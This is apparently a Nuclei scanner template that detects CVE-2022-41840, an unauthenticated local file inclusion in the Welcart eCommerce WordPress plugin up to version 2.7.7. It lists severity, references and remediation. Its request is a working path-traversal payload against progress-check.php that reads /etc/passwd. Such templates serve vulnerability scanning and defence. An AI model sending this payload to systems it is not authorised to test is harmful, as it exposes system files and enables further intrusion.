id: CVE-2022-41840 info: name: Welcart eCommerce <=2.7.7 - Local File Inclusion author: theamanrawat severity: critical description: | Welcart eCommerce 2.7.7 and before are vulnerable to unauthenticated local file inclusion. impact: | The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation. remediation: | Upgrade Welcart eCommerce plugin to the latest version (>=2.7.8) or apply the provided patch to fix the LFI vulnerability. reference: - https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability - https://wordpress.org/plugins/usc-e-shop/ - https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability?_s_id=cve - https://nvd.nist.gov/vuln/detail/CVE-2022-41840 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-41840 cwe-id: CWE-22 epss-score: 0.00738 epss-percentile: 0.78774 cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: collne product: welcart_e-commerce framework: wordpress tags: cve2022,cve,wp-plugin,wordpress,wp,lfi,unauth,usc-e-shop,collne http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd" matchers-condition: and matchers: - type: word part: header words: - "application/json" - type: regex part: body regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 4a0a00473045022100f9dea7e19767e917eccb890bdc7a4b6effb2a1942275ba6bd15aa0362dc6b584022008f8c2bd3da536ba3f893eb70585ac286a8fb272343f3bb94fc865f1fceb68fc:922c64590222798bb761d5b6d8e72950